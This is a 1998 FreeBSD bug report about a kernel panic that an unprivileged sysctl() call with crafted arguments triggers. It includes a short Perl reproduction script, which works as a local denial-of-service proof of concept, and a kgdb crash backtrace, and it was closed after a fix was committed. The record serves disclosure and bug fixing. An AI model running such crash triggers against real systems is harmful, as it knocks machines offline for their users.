From nobody  Mon Dec 28 06:07:20 1998
Received: (from nobody@localhost)
          by hub.freebsd.org (8.8.8/8.8.8) id GAA03719;
          Mon, 28 Dec 1998 06:07:20 -0800 (PST)
          (envelope-from nobody)
Message-Id: <199812281407.GAA03719@hub.freebsd.org>
Date: Mon, 28 Dec 1998 06:07:20 -0800 (PST)
From: gary@hotlava.com
To: freebsd-gnats-submit@freebsd.org
Subject: sysctl crashes system with bad args
X-Send-Pr-Version: www-1.0

>Number:         9218
>Category:       kern
>Synopsis:       sysctl crashes system with bad args
>Confidential:   no
>Severity:       critical
>Priority:       high
>Responsible:    phk
>State:          closed
>Quarter:        
>Keywords:       
>Date-Required:  
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Mon Dec 28 06:10:00 PST 1998
>Closed-Date:    Tue Mar 23 15:15:35 PST 1999
>Last-Modified:  Tue Mar 23 15:17:50 PST 1999
>Originator:     Gary Howland
>Release:        3.0 RELEASE
>Organization:
Hotlava Consulting
>Environment:
3.0 RELEASE
>Description:
The sysctl() call crashes my i386 FreeBSD 3.0-RELEASE machine if
given certain parameters.   I am attempting to do a name2oid using
an OID of 0,3, and since I am doing it from perl, I am using the
syscall() interface with an initial argument of 202 in order to
invoke sysctl.  I am also *not* uid 0.

My args to sysctl appear to be reasonable, but I can't really be
sure what perl is doing with them - could the syscall perhaps be
getting in the way?

Anyway, my args are 202 for sysctl, [0,3] & 2 for the MIB args,
char[56] (all null) and &i (where i == 56) for the next two args,
and "kern.hostname" and &j (where j == 13) for the last two args.

It looks like some sort of problem with name2oid in kern_sysctl.c
(while typing this I've just realised I should try explicitly null
terminating the perl string, to see if that could be the cause of
the problem).  I would have tracked this problem down myself, but
after a couple of hours pissing about with sysctl code, and not
being able to make head nor tail of it, I've given in and am handing
it over to those who know more.  Obviously I would have sooner
posted the fix, rather than the problem, but at least I didn't post
the easy-to-run perl exploit :-)

I can provide the perl code that calls sysctl with the arguments
I described to those who will be working on the problem - just let
me know if you need it.  I don't normally withhold exploits (and
will post it to bugtraq myself if not there in a couple of weeks),
but I do want to give the bug hunters a head start.

I have no idea if this bug can be used to gain privileges, but it
would be interesting to find out.

>How-To-Repeat:
#!/usr/bin/perl -w

sub sysctl { syscall(202, @_) }

my $oid = 0 x 56;
my $oid_len = pack("L", 56);

my $mib = pack("LL", 0, 3); # Undocumented
my $name = "kern.hostname";
my $len = pack("L", length $name);

sysctl($mib, ((length $mib)/4), $oid, $oid_len, $name, $len) && die "Sysctl failed ($!)\n";


>Fix:
Not known - would have done if docs were better!!!

>Release-Note:
>Audit-Trail:

From: Kris Kennaway <kkennawa@physics.adelaide.edu.au>
To: freebsd-gnats-submit@freebsd.org, gary@hotlava.com
Cc:  Subject: Re: kern/9218: sysctl crashes system with bad args
Date: Wed, 30 Dec 1998 15:49:45 +1030 (CST)

 For kicks, I tried this as an unprivileged user, and got the following
 crashdump:
 
 Script started on Tue Dec 29 19:52:22 1998
 GDB is free software and you are welcome to distribute copies of it
  under certain conditions; type "show copying" to see the conditions.
 There is absolutely no warranty for GDB; type "show warranty" for details.
 GDB 4.16 (i386-unknown-freebsd), Copyright 1996 Free Software Foundation, Inc.
 (kgdb) symbol-file kernel
 Reading symbols from kernel...done.
 (kgdb) exec-file /var/crash/kernel.1
 (kgdb) core-file /var/crash/vmcore.1
 IdlePTD 2756608
 initial pcb at 23eb90
 panicstr: kmem_malloc(134537216): kmem_map too small: 3780608 total allocated
 panic messages:
 ---
 panic: kmem_malloc(134537216): kmem_map too small: 3780608 total allocated
 
 syncing disks... 8 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 giving up
 
 dumping to dev 30001, offset 2240
 dump 41 40 39 38 37 36 35 34 33 32 31 30 29 28 27 26 25 24 23 22 21 20 19 18
 17 
 16 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 
 ---
 #0  boot (howto=256) at ../../kern/kern_shutdown.c:285
 ../../kern/kern_shutdown.c:285: No such file or directory.
 (kgdb) where
 #0  boot (howto=256) at ../../kern/kern_shutdown.c:285
 #1  0xf012e13d in panic (
     fmt=0xf021d38a "kmem_malloc(%d): kmem_map too small: %d total allocated")
     at ../../kern/kern_shutdown.c:446
 #2  0xf01cc535 in kmem_malloc (map=0xf0246a90, size=134537216, waitflag=0)
     at ../../vm/vm_kern.c:301
 #3  0xf012ae82 in malloc (size=134536817, type=0xf022dd4c, flags=0)
     at ../../kern/kern_malloc.c:151
 #4  0xf013194a in sysctl_sysctl_name2oid (oidp=0xf022de04, arg1=0x0, arg2=0, 
     req=0xf3893e8c) at ../../kern/kern_sysctl.c:423
 #5  0xf0131374 in sysctl_root (oidp=0x0, arg1=0xf3893f18, arg2=2, 
     req=0xf3893e8c) at ../../kern/kern_sysctl.c:795
 #6  0xf0131526 in userland_sysctl (p=0xf37a3f00, name=0xf3893f18, namelen=2, 
     old=0x8056f00, oldlenp=0x804ddb0, inkernel=0, new=0x804de50, 
     newlen=134536816, retval=0xf3893f14) at ../../kern/kern_sysctl.c:890
 #7  0xf01313d6 in __sysctl (p=0xf37a3f00, uap=0xf3893f84)
     at ../../kern/kern_sysctl.c:826
 #8  0xf01e7ae4 in syscall (frame={tf_es = 39, tf_ds = 39, tf_edi = 134549536, 
       tf_esi = 7, tf_ebp = -272639632, tf_isp = -209109036, 
       tf_ebx = 672029128, tf_edx = 671594204, tf_ecx = 671594237, 
       tf_eax = 202, tf_trapno = 12, tf_err = 2, tf_eip = 672268865, 
       tf_cs = 31, tf_eflags = 530, tf_esp = -272639792, tf_ss = 39})
     at ../../i386/i386/trap.c:1064
 #9  0xf01dbfdc in Xint0x80_syscall ()
 ---Type <return> to continue, or q <return> to quit---
 #10 0x28068c59 in ?? ()
 #11 0x280d134f in ?? ()
 #12 0x8048d8d in ?? ()
 #13 0x8048cb4 in ?? ()
 (kgdb) 
 Script done on Tue Dec 29 19:53:13 1998
 
 Hope this helps someone.
 
 Kris
 
 -----
 (ASP) Microsoft Corporation (MSFT) announced today that the release of its 
 productivity suite, Office 2000, will be delayed until the first quarter
 of 1901.
 
State-Changed-From-To: open->closed 
State-Changed-By: sheldonh 
State-Changed-When: Tue Mar 23 15:15:35 PST 1999 
State-Changed-Why:  
Fixed in src/sys/kern/kern_sysctl.c revision 1.85 . 
His commit. 


Responsible-Changed-From-To: freebsd-bugs->phk 
Responsible-Changed-By: sheldonh 
Responsible-Changed-When: Tue Mar 23 15:15:35 PST 1999 
Responsible-Changed-Why:  
His commit. 
>Unformatted:
